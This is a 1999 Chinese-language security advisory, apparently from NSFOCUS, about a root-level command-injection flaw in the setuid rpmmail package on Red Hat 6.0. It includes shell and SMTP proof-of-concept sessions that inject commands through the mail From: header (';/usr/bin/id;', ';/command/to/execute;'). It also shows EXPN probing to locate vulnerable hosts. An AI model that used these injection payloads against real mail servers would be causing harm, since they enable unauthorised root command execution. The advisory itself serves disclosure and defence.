安全研究

安全漏洞
Red Hat 6.0最新rpmmail本地/远程漏洞

发布日期:1999-06-19
更新日期:1999-06-19

受影响系统:
Linux
+RedHat 6.0
描述:
在Red Hat 6.0的附加CD中,有一个软件包,叫作rpmmail package。安装后的rpmmail存在严重的ROOT级的漏洞。此漏洞可能会使远程/本地的普通用户获得ROOT权,或以"nobody"身份远程执行任意指令。

    给rpmmail@vulnerablehost发送一封e-mail,可以使/home/rpmmail/rpmmail (默认设置为suid root, 能由.forward远程执行)向system(3)执行任何你所希望的指令。指令的执行并不一定需要ROOT权限,因为bash's handling of euid != uid of caller。虽然system(3)调用/bin/sh -c,但在某些linux系统的默认设置下,比如SuSE 6.2,其被联结至/bin/bash v2。从system(3)连机手册可知,此漏洞在/bin/sh为bash version 2的系统中无效,因为自bash version 2开始,/bin/sh在启动时,取消了原来所具有的特殊权限。因此,一些安装了rpmmail的系统存在 远程/本地ROOT 漏洞。所有没有特殊权限others组的用户都可以远程执行指令。

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

本地漏洞如下:

/bin/sh is linked to /bin/bash (default SuSE 6.2 behavior:
bash-2.03$ ls -la /bin/sh
lrwxrwxrwx 1 root root 9 Oct 5 11:27 /bin/sh -> /bin/bash
bash-2.03$ cat /etc/SuSE-release;uname -a;id
SuSE Linux 6.2 (i386)
VERSION = 6.2
Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
uid=100(xnec) gid=100(users) groups=100(users)
bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah
Could not open config file!
sh: Y: command not found
uid=100(xnec) gid=100(users) groups=100(users)
Could not open acknowledge file!
bash-2.03$

----

After linking /bin/sh to /bin/ksh instead:

bash-2.03$ ls -la /bin/sh
lrwxrwxrwx 1 root root 8 Oct 5 11:09 /bin/sh -> /bin/ksh
bash-2.03$ cat /etc/SuSE-release;uname -a;id
SuSE Linux 6.2 (i386)
VERSION = 6.2
Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
uid=100(xnec) gid=100(users) groups=100(users)
bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah
Could not open config file!
sh: Y: not found
uid=100(xnec) gid=100(users) euid=0(root) egid=0(root) groups=100(users)
Could not open acknowledge file!
bash-2.03$


远程漏洞如下:

bash-2.03$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:31:13 -0500
(CDT)
MAIL FROM: ;/command/to/execute;
250 <;/command/to/execute;> ... Sender Okay
RCPT TO: rpmmail
250 <rpmmail> ... Recipient Okay
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit

对有此项漏洞主机的确认非常简单,可以通过EXPN命令来校验.forward是否存在:

220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:38:44 -0500
(CDT)
EXPN rpmmail
250 "| /home/rpmmail/rpmmail -c /home/rpmmail/rpmmail.conf"



建议:
暂无

浏览次数:11156
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障